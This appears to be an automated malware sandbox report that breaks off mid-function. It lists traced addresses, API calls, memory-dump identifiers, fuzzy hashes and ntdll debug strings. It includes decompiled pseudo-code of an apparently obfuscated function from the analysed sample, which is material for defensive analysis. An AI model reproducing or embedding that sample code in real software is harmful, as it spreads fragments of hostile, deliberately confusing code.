                                                                                                                            0x0040178d
                                                                                                                            0x0040178e
                                                                                                                            0x0040178f
                                                                                                                            0x00401795
                                                                                                                            0x00401797
                                                                                                                            0x00401797
                                                                                                                            0x00401798
                                                                                                                            0x00401799
                                                                                                                            0x0040179a
                                                                                                                            0x0040179b
                                                                                                                            0x004017a2
                                                                                                                            0x004017a3
                                                                                                                            0x004017a6
                                                                                                                            0x004017a7
                                                                                                                            0x004017a7
                                                                                                                            0x004017a7
                                                                                                                            0x004017a8
                                                                                                                            0x004017a8
                                                                                                                            0x004017a8
                                                                                                                            0x004017a9
                                                                                                                            0x004017a9
                                                                                                                            0x004017aa
                                                                                                                            0x004017aa
                                                                                                                            0x004017aa
                                                                                                                            0x004017aa
                                                                                                                            0x004017ae
                                                                                                                            0x004017ae
                                                                                                                            0x004017f7
                                                                                                                            0x004017f7
                                                                                                                            0x004017f7
                                                                                                                            0x004017f8
                                                                                                                            0x004017f8
                                                                                                                            0x004017f8
                                                                                                                            0x004017f5
                                                                                                                            0x00000000
                                                                                                                            0x004017e0
                                                                                                                            0x00401772
                                                                                                                            0x00401772
                                                                                                                            0x00401772
                                                                                                                            0x00401772
                                                                                                                            0x00401773
                                                                                                                            0x0040176a
                                                                                                                            0x0040176a
                                                                                                                            0x0040176a
                                                                                                                            0x00401771
                                                                                                                            0x00000000
                                                                                                                            0x00401771
                                                                                                                            0x00401775
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401859
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.429729264.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: 28b29540905efe5db8ff2bd5dd41cd95d97ba45c28065df784f5026ed89a0097
                                                                                                                            • Instruction ID: a894bf59af688e7f2aefbaf232239d4a7e11f6dbdc9ab261776b6b6844387aa1
                                                                                                                            • Opcode Fuzzy Hash: 28b29540905efe5db8ff2bd5dd41cd95d97ba45c28065df784f5026ed89a0097
                                                                                                                            • Instruction Fuzzy Hash: 0A018432644201EBEB00BA909D42D6E3325AF44714F248137FA17BA1E1D63EDB22976B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004017F8, Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 35%
                                                                                                                            			E004017F8(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t30;
				void* _t37;
				signed int _t39;

				L0:
				while(1) {
					_t30 = __eax;
					asm("xlatb");
					__eax =  *__edi * 8;
					__eflags = __eax;
					_t12 = __eax;
					__eax = __esp;
					__esp = _t12;
					_t13 = __eax;
					__eax = _t12;
					__esp = _t13;
					__eax = _t13;
					__esp = _t12;
					if(__eflags > 0) {
						L2:
						asm("cmpsd");
						L3:
						_t3 = _t30;
						_t30 = _t37;
						_t37 = _t3;
						if(_t39 > 0) {
							L1:
							_t1 = _t30 + 0xe;
							 *_t1 =  *(_t30 + 0xe) << 0x4d;
							_t39 =  *_t1;
							goto L2;
						}
						L4:
						return _t30;
					} else {
						L12:
						asm("cld");
						if (__eflags < 0) goto L3;
						L13:
						_t15 = __eax;
						__eax = __edi;
						__edi = _t15;
					}
					L37:
				}
				if(__eflags > 0) {
					__eax = L0040146D(__ebx, __edx, __edi, __esi); // executed
					__eax =  *__ebx(__ebx, __eax); // executed
					__eax =  *__esp;
					__al = __al & 0x00000083;
					asm("les eax, [ebx+ebp*8]");
					__eax = __eax + 0xefeb0eeb;
					__eflags = __eax;
					__esp = __esp + 4;
					__eax = L0040115A(__eax, __edx, __edi, __esi, __eflags);
					__edi = 0x66;
					__esi = 0x1851;
					__ebx = 0xffffffff;
					__esp = __ebp;
					__ebp = 0;
					return __eax;
				} else {
					__bh = __bh &  *(__edi - 0x65);
					asm("clc");
					asm("popfd");
					asm("lodsd");
					asm("enter 0xe0fc, 0x97");
					_t19 = __eax;
					__eax = __esp;
					__esp = _t19;
					_t20 = __eax;
					__eax = _t19;
					__esp = _t20;
					asm("int 0x7f");
					__eax = __ecx;
					__ecx = _t19;
					__bh = 0x7f;
					asm("pushad");
					asm("repne jl 0xffffffd4");
					asm("insd");
					__ebp =  *(__ebx + 0x5f) * 0x5e;
					__eflags = __ebp;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
				goto L37;
			}






                                                                                                                            0x004017f8
                                                                                                                            0x004017f8
                                                                                                                            0x004017f8
                                                                                                                            0x004017f8
                                                                                                                            0x004017d0
                                                                                                                            0x004017d0
                                                                                                                            0x004017d3
                                                                                                                            0x004017d3
                                                                                                                            0x004017d3
                                                                                                                            0x004017d4
                                                                                                                            0x004017d4
                                                                                                                            0x004017d4
                                                                                                                            0x004017d5
                                                                                                                            0x004017d5
                                                                                                                            0x004017d6
                                                                                                                            0x00401771
                                                                                                                            0x00401771
                                                                                                                            0x00401772
                                                                                                                            0x00401772
                                                                                                                            0x00401772
                                                                                                                            0x00401772
                                                                                                                            0x00401773
                                                                                                                            0x0040176a
                                                                                                                            0x0040176a
                                                                                                                            0x0040176a
                                                                                                                            0x0040176a
                                                                                                                            0x00000000
                                                                                                                            0x0040176e
                                                                                                                            0x00401775
                                                                                                                            0x00401775
                                                                                                                            0x004017d8
                                                                                                                            0x004017d8
                                                                                                                            0x004017d8
                                                                                                                            0x004017d9
                                                                                                                            0x004017da
                                                                                                                            0x004017da
                                                                                                                            0x004017da
                                                                                                                            0x004017da
                                                                                                                            0x004017da
                                                                                                                            0x00000000
                                                                                                                            0x004017d6
                                                                                                                            0x004017f9
                                                                                                                            0x00401878
                                                                                                                            0x00401881
                                                                                                                            0x00401890
                                                                                                                            0x00401892
                                                                                                                            0x00401894
                                                                                                                            0x00401897
                                                                                                                            0x00401897
                                                                                                                            0x004018a8
                                                                                                                            0x004018b2
                                                                                                                            0x004018b7
                                                                                                                            0x004018b8
                                                                                                                            0x004018b9
                                                                                                                            0x004018ba
                                                                                                                            0x004018ba
                                                                                                                            0x004018bb
                                                                                                                            0x004017fb
                                                                                                                            0x004017fb
                                                                                                                            0x004017fe
                                                                                                                            0x004017ff
                                                                                                                            0x00401801
                                                                                                                            0x00401802
                                                                                                                            0x00401806
                                                                                                                            0x00401806
                                                                                                                            0x00401806
                                                                                                                            0x00401807
                                                                                                                            0x00401807
                                                                                                                            0x00401807
                                                                                                                            0x00401808
                                                                                                                            0x0040180a
                                                                                                                            0x0040180a
                                                                                                                            0x0040180b
                                                                                                                            0x0040180e
                                                                                                                            0x0040180f
                                                                                                                            0x00401812
                                                                                                                            0x00401813
                                                                                                                            0x00401813
                                                                                                                            0x00401817
                                                                                                                            0x00401818
                                                                                                                            0x00401818
                                                                                                                            0x00401819
                                                                                                                            0x00401819
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.429729264.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 560597551-0
                                                                                                                            • Opcode ID: 24457665454172ec648fb8d2a6e20ed3a66d6914c2e0f3d8e5c3e978159e5634
                                                                                                                            • Instruction ID: 5d664576ed34e104d60d9d9409068ebedb4ca3d0074abe090f0a839b89efd0e8
                                                                                                                            • Opcode Fuzzy Hash: 24457665454172ec648fb8d2a6e20ed3a66d6914c2e0f3d8e5c3e978159e5634
                                                                                                                            • Instruction Fuzzy Hash: DCF0C233748211DAE205B6599C83B29B3909F11724F24813BE557BB1E2D26E9622525F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B21967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(6B261C65,000000FF,00000007,?,00000004,00000000,?,?,?,6B261951,00000065,00000000,?,6B260C5E,?,00000000), ref: 6B219694
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 9f07a7f2e3e671e1558304b3b2bc6c6797e5209f984f0ab7ad9dd2aa5175daf0
                                                                                                                            • Instruction ID: 66fdf2f9c02af13119067710a5a3831c55345cee2003ac138c11cfd7ebf0b8c7
                                                                                                                            • Opcode Fuzzy Hash: 9f07a7f2e3e671e1558304b3b2bc6c6797e5209f984f0ab7ad9dd2aa5175daf0
                                                                                                                            • Instruction Fuzzy Hash: AEB02BB1C050C9C5D200D37006087077F803BC0381F22C071D3020600B433CC091F5B1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(6B261A59,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6B2199AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 3fa950129b485ba6058e4581261667105f3ccbc64f4a50710c95931d1983bac8
                                                                                                                            • Instruction ID: 592be560c6ce3d43511351ceea15c36b0f31b86804587c3652f8166c4a2a0cb9
                                                                                                                            • Opcode Fuzzy Hash: 3fa950129b485ba6058e4581261667105f3ccbc64f4a50710c95931d1983bac8
                                                                                                                            • Instruction Fuzzy Hash: 189002F138100842D10061694454B0645469BE13D1F61C125E5058924D866DCC527166
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B219820, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(6B232EA4,?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\,?,?,00000002,?), ref: 6B21982A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 379097f4c0d77a86fbc05c1dfa3fb91fefa0a028268c42729d39aaf9a172a166
                                                                                                                            • Instruction ID: 7b3043da20365fb13892716293cd5c3fa946a09c9daeee5f5f154f7bf78805cd
                                                                                                                            • Opcode Fuzzy Hash: 379097f4c0d77a86fbc05c1dfa3fb91fefa0a028268c42729d39aaf9a172a166
                                                                                                                            • Instruction Fuzzy Hash: 429002B128100802D14171694444606454A6BD02D1FA1C122A4418924E86A98A56BAA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B219860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(6B2615BB,00000073,?,00000008,00000000,?,00000568), ref: 6B21986A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: f0581ebc0c4c2dbd19f9b95f90e2412141affffbfc7c7a4bb8fefc3096b9a5a5
                                                                                                                            • Instruction ID: 0f63c897eecdb5a21203b826c6671fa66a828bf13bf899a7526f5b0246f2b520
                                                                                                                            • Opcode Fuzzy Hash: f0581ebc0c4c2dbd19f9b95f90e2412141affffbfc7c7a4bb8fefc3096b9a5a5
                                                                                                                            • Instruction Fuzzy Hash: C79002B124100813D11161694544707454A5BD02D1FA1C522A4418928D96AA8952B161
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2198C0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(6B26108E,000000FF,000000FF,000000FF,?,001FFFFF,00000002,00000000,6B2B07D0,00000058,6B260C91,?,00000000,?,00000000), ref: 6B2198CA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 8f5ba1d9089d69f0566e2a582f301c82a002a83478f30653b06c95916c044d5a
                                                                                                                            • Instruction ID: c6336ce01bd68419fdfcf9d7533c520c7f79c93ced2854c00f2a3d745bb298b6
                                                                                                                            • Opcode Fuzzy Hash: 8f5ba1d9089d69f0566e2a582f301c82a002a83478f30653b06c95916c044d5a
                                                                                                                            • Instruction Fuzzy Hash: 039002B124100882E10161694444F06554A5BE02D1FA1C126A501D934D8669C952B265
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B219780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(6B261A79,?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?,?,00000004), ref: 6B21978A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 252f6d9f76ad93cdae5d3b58f4b81221a7a261cfb5e1ca6ff0a33ff585f61355
                                                                                                                            • Instruction ID: 974963663a34799c5f724a95bbbe226d7b9c7e75528ce5c0b7acf9bdc24a5714
                                                                                                                            • Opcode Fuzzy Hash: 252f6d9f76ad93cdae5d3b58f4b81221a7a261cfb5e1ca6ff0a33ff585f61355
                                                                                                                            • Instruction Fuzzy Hash: 549002B925300402D1807169544860A45465BD12D2FA1D525A4009928CC96988696361
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B219600, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(6B211119,?,?,00000018,?), ref: 6B21960A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 75fbe4bb6a261a00b8c101f371d195cb019a024d4896c862f0f6ed9959fbf852
                                                                                                                            • Instruction ID: d7805681d997e059168086e4255f5ca4a0b92e801b2cd51549e8d77953249a70
                                                                                                                            • Opcode Fuzzy Hash: 75fbe4bb6a261a00b8c101f371d195cb019a024d4896c862f0f6ed9959fbf852
                                                                                                                            • Instruction Fuzzy Hash: 9A9002B124100842D10062694444B4A86466BE03D1F61C125A4408A24D85A988617161
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B219660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(6B2618BF,000000FF,00000000,00000000,0000000C,00001000,00000004,6B2B0810,0000001C,6B261616), ref: 6B21966A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 9abf1749c5ac9f1766107394d7ff9d808d45ea26ef5f0b44fbd274e04ccc1820
                                                                                                                            • Instruction ID: e06ceda44217ccef9bf2f13a708b6c5068425602c6b2f39016e42ac98d353d40
                                                                                                                            • Opcode Fuzzy Hash: 9abf1749c5ac9f1766107394d7ff9d808d45ea26ef5f0b44fbd274e04ccc1820
                                                                                                                            • Instruction Fuzzy Hash: 4D9002B124100C02D1807169444464A45465BD13D1FA1C125A4019A24DCA698A5977E1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 6B28B260, Relevance: 91.3, APIs: 22, Strings: 30, Instructions: 262COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrintEx.1105(00000065,00000000, *** Unhandled exception 0x%08lx, hit in %ws:%s,?,<unknown>,?,6B2B0DD8,00000018,6B28B5A3,?,6B1B48A4,?,?,6B21B74A,6B1B1650,6B21B627), ref: 6B28B2E6
                                                                                                                            • DbgPrintEx.1105(00000065,00000000, *** A stack buffer overrun occurred in %ws:%s,<unknown>,?,6B2B0DD8,00000018,6B28B5A3,?,6B1B48A4,?,?,6B21B74A,6B1B1650,6B21B627,6B21B627), ref: 6B28B2FD
                                                                                                                            • DbgPrintEx.1105(00000065,00000000,This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.), ref: 6B28B30C
                                                                                                                            • DbgPrintEx.1105(00000065,00000000,If this bug ends up in the shipping product, it could be a severe security hole.), ref: 6B28B31B
                                                                                                                            • DbgPrintEx.1105(00000065,00000000,a NULL pointer), ref: 6B28B4E7
                                                                                                                            • DbgPrintEx.1105(00000065,00000000, *** enter .exr %p for the exception record,?), ref: 6B28B4F8
                                                                                                                            • DbgPrintEx.1105(00000065,00000000, *** enter .cxr %p for the context,?), ref: 6B28B514
                                                                                                                            • DbgPrintEx.1105(00000065,00000000, *** then kb to get the faulting stack), ref: 6B28B523
                                                                                                                            • DbgPrintEx.1105(00000065,00000000, *** Restarting wait on critsec or resource at %p (in %ws:%s),?,?,?), ref: 6B28B546
                                                                                                                            • RtlReportException.1105(00000000,?,00000000), ref: 6B28B566
                                                                                                                            Strings
                                                                                                                            • The instruction at %p referenced memory at %p., xrefs: 6B28B432
                                                                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 6B28B53F
                                                                                                                            • a NULL pointer, xrefs: 6B28B4E0
                                                                                                                            • Go determine why that thread has not released the critical section., xrefs: 6B28B3C5
                                                                                                                            • <unknown>, xrefs: 6B28B27E, 6B28B2D1, 6B28B350, 6B28B399, 6B28B417, 6B28B48E
                                                                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 6B28B484
                                                                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 6B28B305
                                                                                                                            • an invalid address, %p, xrefs: 6B28B4CF
                                                                                                                            • The resource is owned exclusively by thread %p, xrefs: 6B28B374
                                                                                                                            • *** Inpage error in %ws:%s, xrefs: 6B28B418
                                                                                                                            • read from, xrefs: 6B28B4AD, 6B28B4B2
                                                                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 6B28B352
                                                                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 6B28B39B
                                                                                                                            • The instruction at %p tried to %s , xrefs: 6B28B4B6
                                                                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 6B28B323
                                                                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 6B28B2DC
                                                                                                                            • The resource is owned shared by %d threads, xrefs: 6B28B37E
                                                                                                                            • *** enter .exr %p for the exception record, xrefs: 6B28B4F1
                                                                                                                            • *** enter .cxr %p for the context, xrefs: 6B28B50D
                                                                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 6B28B476
                                                                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 6B28B314
                                                                                                                            • *** then kb to get the faulting stack, xrefs: 6B28B51C
                                                                                                                            • write to, xrefs: 6B28B4A6
                                                                                                                            • This failed because of error %Ix., xrefs: 6B28B446
                                                                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 6B28B2F3
                                                                                                                            • The critical section is owned by thread %p., xrefs: 6B28B3B9
                                                                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 6B28B47D
                                                                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 6B28B3D6
                                                                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 6B28B48F
                                                                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 6B28B38F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$ExceptionReport
                                                                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                            • API String ID: 374826753-108210295
                                                                                                                            • Opcode ID: d76baa2e8bfd9c2154b8a07a8d02739fc5b88dcf57b2c1febcd8eedb93e45e81
                                                                                                                            • Instruction ID: ec908030ed048c24fc21a909f43ccfc365ca02e1ffb898c77c048b63871564e6
                                                                                                                            • Opcode Fuzzy Hash: d76baa2e8bfd9c2154b8a07a8d02739fc5b88dcf57b2c1febcd8eedb93e45e81
                                                                                                                            • Instruction Fuzzy Hash: AE81F375980108FFDB164A158CDEE6B3BB5EF57796F400088F5082B192E32E9556CAB3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B291C06, Relevance: 80.7, APIs: 21, Strings: 25, Instructions: 195COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 44%
                                                                                                                            			E6B291C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x6b1b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E6B1DB150();
				} else {
					E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x6b2c589c);
				E6B1DB150("Heap error detected at %p (heap handle %p)\n",  *0x6b2c58a0);
				_t27 =  *0x6b2c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M6B291E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E6B1DB150();
				} else {
					E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E6B1DB150("Error code: %d - %s\n",  *0x6b2c5898);
				_t113 =  *0x6b2c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E6B1DB150();
